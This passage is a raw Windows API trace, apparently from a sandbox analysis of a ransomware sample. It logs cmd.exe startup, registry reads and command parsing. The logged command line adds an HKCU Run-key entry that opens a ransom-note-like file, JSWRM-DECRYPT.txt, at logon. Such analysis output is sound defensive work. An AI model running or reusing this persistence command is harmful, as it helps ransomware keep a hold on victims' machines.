lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ffe0c | out: phkResult=0x1ffe0c*=0x0) returned 0x2 [0050.597] VirtualQuery (in: lpAddress=0x1ffe17, lpBuffer=0x1ffdc4, dwLength=0x1c | out: lpBuffer=0x1ffdc4*(BaseAddress=0x1ff000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.597] VirtualQuery (in: lpAddress=0x100000, lpBuffer=0x1ffdc4, dwLength=0x1c | out: lpBuffer=0x1ffdc4*(BaseAddress=0x100000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0050.597] VirtualQuery (in: lpAddress=0x101000, lpBuffer=0x1ffdc4, dwLength=0x1c | out: lpBuffer=0x1ffdc4*(BaseAddress=0x101000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0050.597] VirtualQuery (in: lpAddress=0x103000, lpBuffer=0x1ffdc4, dwLength=0x1c | out: lpBuffer=0x1ffdc4*(BaseAddress=0x103000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.597] VirtualQuery (in: lpAddress=0x200000, lpBuffer=0x1ffdc4, dwLength=0x1c | out: lpBuffer=0x1ffdc4*(BaseAddress=0x200000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x11000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0050.597] GetConsoleOutputCP () returned 0x1b5 [0050.638] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0050.638] SetConsoleCtrlHandler (HandlerRoutine=0xe17260, Add=1) returned 1 [0050.638] _get_osfhandle (_FileHandle=1) returned 0x90 [0050.638] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe2388c | out: lpMode=0xe2388c) returned 1 [0050.677] _get_osfhandle (_FileHandle=0) returned 0x8c [0050.677] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23888 | out: lpMode=0xe23888) returned 1 [0050.756] _get_osfhandle (_FileHandle=1) returned 0x90 [0050.756] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0050.797] _get_osfhandle (_FileHandle=1) returned 0x90 [0050.797] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe23890 | out: lpMode=0xe23890) returned 1 [0050.883] _get_osfhandle (_FileHandle=1) returned 0x90 [0050.883] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0050.997] _get_osfhandle (_FileHandle=0) returned 0x8c [0050.997] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23894 | out: lpMode=0xe23894) returned 1 [0051.088] _get_osfhandle (_FileHandle=0) returned 0x8c [0051.088] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0051.165] GetEnvironmentStringsW () returned 0x754ca8* [0051.165] GetProcessHeap () returned 0x750000 [0051.165] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xaca) returned 0x755780 [0051.166] FreeEnvironmentStringsA (penv="A") returned 1 [0051.166] GetProcessHeap () returned 0x750000 [0051.166] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x4) returned 0x754788 [0051.166] GetEnvironmentStringsW () returned 0x754ca8* [0051.166] GetProcessHeap () returned 0x750000 [0051.166] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xaca) returned 0x756258 [0051.166] FreeEnvironmentStringsA (penv="A") returned 1 [0051.166] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1fed68 | out: phkResult=0x1fed68*=0xcc) returned 0x0 [0051.166] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1fed70, lpData=0x1fed74, lpcbData=0x1fed6c*=0x1000 | out: lpType=0x1fed70*=0x0, lpData=0x1fed74*=0xf8, lpcbData=0x1fed6c*=0x1000) returned 0x2 [0051.166] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1fed70, lpData=0x1fed74, lpcbData=0x1fed6c*=0x1000 | out: lpType=0x1fed70*=0x4, lpData=0x1fed74*=0x1, lpcbData=0x1fed6c*=0x4) returned 0x0 [0051.166] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1fed70, lpData=0x1fed74, lpcbData=0x1fed6c*=0x1000 | out: lpType=0x1fed70*=0x0, lpData=0x1fed74*=0x1, lpcbData=0x1fed6c*=0x1000) returned 0x2 [0051.166] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1fed70, lpData=0x1fed74, lpcbData=0x1fed6c*=0x1000 | out: lpType=0x1fed70*=0x4, lpData=0x1fed74*=0x0, lpcbData=0x1fed6c*=0x4) returned 0x0 [0051.166] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1fed70, lpData=0x1fed74, lpcbData=0x1fed6c*=0x1000 | out: lpType=0x1fed70*=0x4, lpData=0x1fed74*=0x40, lpcbData=0x1fed6c*=0x4) returned 0x0 [0051.166] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1fed70, lpData=0x1fed74, lpcbData=0x1fed6c*=0x1000 | out: lpType=0x1fed70*=0x4, lpData=0x1fed74*=0x40, lpcbData=0x1fed6c*=0x4) returned 0x0 [0051.166] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1fed70, lpData=0x1fed74, lpcbData=0x1fed6c*=0x1000 | out: lpType=0x1fed70*=0x0, lpData=0x1fed74*=0x40, lpcbData=0x1fed6c*=0x1000) returned 0x2 [0051.167] RegCloseKey (hKey=0xcc) returned 0x0 [0051.167] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1fed68 | out: phkResult=0x1fed68*=0xcc) returned 0x0 [0051.167] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1fed70, lpData=0x1fed74, lpcbData=0x1fed6c*=0x1000 | out: lpType=0x1fed70*=0x0, lpData=0x1fed74*=0x40, lpcbData=0x1fed6c*=0x1000) returned 0x2 [0051.167] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1fed70, lpData=0x1fed74, lpcbData=0x1fed6c*=0x1000 | out: lpType=0x1fed70*=0x4, lpData=0x1fed74*=0x1, lpcbData=0x1fed6c*=0x4) returned 0x0 [0051.167] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1fed70, lpData=0x1fed74, lpcbData=0x1fed6c*=0x1000 | out: lpType=0x1fed70*=0x0, lpData=0x1fed74*=0x1, lpcbData=0x1fed6c*=0x1000) returned 0x2 [0051.167] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1fed70, lpData=0x1fed74, lpcbData=0x1fed6c*=0x1000 | out: lpType=0x1fed70*=0x4, lpData=0x1fed74*=0x0, lpcbData=0x1fed6c*=0x4) returned 0x0 [0051.167] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1fed70, lpData=0x1fed74, lpcbData=0x1fed6c*=0x1000 | out: lpType=0x1fed70*=0x4, lpData=0x1fed74*=0x9, lpcbData=0x1fed6c*=0x4) returned 0x0 [0051.167] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1fed70, lpData=0x1fed74, lpcbData=0x1fed6c*=0x1000 | out: lpType=0x1fed70*=0x4, lpData=0x1fed74*=0x9, lpcbData=0x1fed6c*=0x4) returned 0x0 [0051.167] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1fed70, lpData=0x1fed74, lpcbData=0x1fed6c*=0x1000 | out: lpType=0x1fed70*=0x0, lpData=0x1fed74*=0x9, lpcbData=0x1fed6c*=0x1000) returned 0x2 [0051.167] RegCloseKey (hKey=0xcc) returned 0x0 [0051.167] time (in: timer=0x0 | out: timer=0x0) returned 0x5d302271 [0051.167] srand (_Seed=0x5d302271) [0051.167] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y" [0051.167] malloc (_Size=0x4000) returned 0xa021f0 [0051.168] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y" [0051.168] malloc (_Size=0xffce) returned 0x850048 [0051.168] ??_V@YAXPAX@Z () returned 0x1ffd4c [0051.169] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x850048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0051.169] malloc (_Size=0xffce) returned 0x860020 [0051.169] ??_V@YAXPAX@Z () returned 0x1ffb20 [0051.170] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x860020, nSize=0x7fe7 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0051.170] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0051.170] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0051.170] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0051.170] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0051.170] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0051.170] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0051.170] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0051.170] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0051.170] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0051.170] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0051.170] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0051.170] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0051.171] GetProcessHeap () returned 0x750000 [0051.171] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x755780) returned 1 [0051.171] GetEnvironmentStringsW () returned 0x754ca8* [0051.171] GetProcessHeap () returned 0x750000 [0051.171] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xae2) returned 0x757820 [0051.171] FreeEnvironmentStringsA (penv="A") returned 1 [0051.171] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0051.171] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0051.171] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0051.171] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0051.171] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0051.171] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0051.171] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0051.171] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0051.171] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0051.171] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0051.171] malloc (_Size=0xffce) returned 0x86fff8 [0051.172] ??_V@YAXPAX@Z () returned 0x1ff8b8 [0051.172] GetProcessHeap () returned 0x750000 [0051.172] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x38) returned 0x750ae0 [0051.172] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x86fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0051.172] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x86fff8, lpFilePart=0x1ff904 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x1ff904*="Desktop") returned 0x17 [0051.173] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0051.173] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ff688 | out: lpFindFileData=0x1ff688*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x750b20 [0051.173] FindClose (in: hFindFile=0x750b20 | out: hFindFile=0x750b20) returned 1 [0051.173] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x1ff688 | out: lpFindFileData=0x1ff688*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x750b20 [0051.173] FindClose (in: hFindFile=0x750b20 | out: hFindFile=0x750b20) returned 1 [0051.174] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x1ff688 | out: lpFindFileData=0x1ff688*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xff77889f, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0xff77889f, ftLastWriteTime.dwHighDateTime=0x1d53d3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x750b20 [0051.174] FindClose (in: hFindFile=0x750b20 | out: hFindFile=0x750b20) returned 1 [0051.174] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0051.174] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0051.174] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0051.174] GetProcessHeap () returned 0x750000 [0051.174] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x757820) returned 1 [0051.174] GetEnvironmentStringsW () returned 0x754ca8* [0051.174] GetProcessHeap () returned 0x750000 [0051.174] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xb1a) returned 0x756d30 [0051.174] FreeEnvironmentStringsA (penv="=") returned 1 [0051.174] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x850048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0051.174] GetProcessHeap () returned 0x750000 [0051.174] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x750ae0) returned 1 [0051.174] ??_V@YAXPAX@Z () returned 0x1 [0051.174] ??_V@YAXPAX@Z () returned 0x1 [0051.174] GetProcessHeap () returned 0x750000 [0051.174] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x400e) returned 0x758e38 [0051.175] GetProcessHeap () returned 0x750000 [0051.175] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xee) returned 0x757858 [0051.175] GetProcessHeap () returned 0x750000 [0051.175] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x758e38) returned 1 [0051.175] GetConsoleOutputCP () returned 0x1b5 [0051.294] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0051.294] GetUserDefaultLCID () returned 0x409 [0051.294] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xe1f82c, cchData=8 | out: lpLCData=":") returned 2 [0051.294] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ffc74, cchData=128 | out: lpLCData="0") returned 2 [0051.294] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ffc74, cchData=128 | out: lpLCData="0") returned 2 [0051.294] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ffc74, cchData=128 | out: lpLCData="1") returned 2 [0051.294] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xe1f81c, cchData=8 | out: lpLCData="/") returned 2 [0051.294] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xe1f7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0051.294] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xe1f778, cchData=32 | out: lpLCData="Tue") returned 4 [0051.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xe1f738, cchData=32 | out: lpLCData="Wed") returned 4 [0051.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xe1f6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0051.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xe1f6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0051.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xe1f678, cchData=32 | out: lpLCData="Sat") returned 4 [0051.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xe1f638, cchData=32 | out: lpLCData="Sun") returned 4 [0051.295] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xe1f80c, cchData=8 | out: lpLCData=".") returned 2 [0051.295] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xe1f7f8, cchData=8 | out: lpLCData=",") returned 2 [0051.295] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0051.297] GetProcessHeap () returned 0x750000 [0051.297] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20c) returned 0x757998 [0051.297] GetConsoleTitleW (in: lpConsoleTitle=0x757998, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0051.537] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0051.537] GetProcAddress (hModule=0x75e90000, lpProcName="CopyFileExW") returned 0x75ea4330 [0051.537] GetProcAddress (hModule=0x75e90000, lpProcName="IsDebuggerPresent") returned 0x75ea5930 [0051.537] GetProcAddress (hModule=0x75e90000, lpProcName="SetConsoleInputExeNameW") returned 0x74fe09d0 [0051.537] ??_V@YAXPAX@Z () returned 0x1 [0051.538] GetProcessHeap () returned 0x750000 [0051.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x400a) returned 0x758e38 [0051.538] GetProcessHeap () returned 0x750000 [0051.538] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x758e38) returned 1 [0051.538] _wcsicmp (_String1="reg", _String2=")") returned 73 [0051.539] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0051.539] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0051.539] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0051.539] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0051.539] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0051.539] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0051.539] GetProcessHeap () returned 0x750000 [0051.539] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x58) returned 0x757bb0 [0051.539] GetProcessHeap () returned 0x750000 [0051.539] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x10) returned 0x757c10 [0051.541] GetProcessHeap () returned 0x750000 [0051.541] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xe4) returned 0x757c28 [0051.541] GetConsoleTitleW (in: lpConsoleTitle=0x1ffb68, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0051.657] malloc (_Size=0xffce) returned 0x862688 [0051.658] ??_V@YAXPAX@Z () returned 0x1ff8f4 [0051.658] malloc (_Size=0xffce) returned 0x872660 [0051.658] ??_V@YAXPAX@Z () returned 0x1ff6ac [0051.661] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0051.661] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0051.661] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0051.661] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0051.661] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0051.661] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0051.661] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0051.661] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0051.661] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0051.661] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0051.661] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0051.661] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0051.661] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0051.661] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0051.661] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0051.661] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0051.661] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0051.661] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0051.661] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0051.661] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0051.661] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0051.661] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0051.661] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0051.661] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0051.661] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0051.661] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0051.661] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0051.661] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0051.662] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0051.662] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0051.662] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0051.662] _wcsicmp (_String1="reg", _String2="START") returned -1 [0051.662] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0051.662] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0051.662] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0051.662] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0051.662] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0051.662] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0051.662] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0051.662] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0051.662] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0051.662] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0051.662] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0051.662] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0051.662] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0051.662] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0051.662] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0051.662] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0051.662] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0051.662] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0051.662] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0051.662] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0051.662] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0051.662] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0051.662] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0051.662] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0051.662] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0051.662] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0051.662] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0051.662] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0051.662] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0051.662] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0051.662] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0051.663] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0051.663] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0051.663] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0051.663] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0051.663] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0051.663] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0051.663] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0051.663] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0051.663] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0051.663] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0051.663] _wcsicmp (_String1="reg", _String2="START") returned -1 [0051.663] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0051.663] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0051.663] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0051.663] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0051.663] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0051.663] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0051.663] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0051.663] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0051.663] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0051.663] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0051.663] _wcsicmp (_String1="reg", _String2="FOR") returned 12 [0051.663] _wcsicmp (_String1="reg", _String2="IF") returned 9 [0051.663] _wcsicmp (_String1="reg", _String2="REM") returned -6 [0051.663] ??_V@YAXPAX@Z () returned 0x1 [0051.663] GetProcessHeap () returned 0x750000 [0051.663] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xffd6) returned 0x758e38 [0051.664] GetProcessHeap () returned 0x750000 [0051.664] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xec) returned 0x757d18 [0051.664] _wcsnicmp (_String1="reg", _String2="cmd ", _MaxCount=0x4) returned 15 [0051.664] malloc (_Size=0xffce) returned 0x872660 [0051.664] ??_V@YAXPAX@Z () returned 0x1ff42c [0051.664] GetProcessHeap () returned 0x750000 [0051.665] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1ffa4) returned 0x768e18 [0051.666] SetErrorMode (uMode=0x0) returned 0x0 [0051.666] SetErrorMode (uMode=0x1) returned 0x0 [0051.666] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x768e20, lpFilePart=0x1ff44c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x1ff44c*="Desktop") returned 0x17 [0051.667] SetErrorMode (uMode=0x0) returned 0x1 [0051.667] GetProcessHeap () returned 0x750000 [0051.667] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x768e18, Size=0x40) returned 0x768e18 [0051.667] 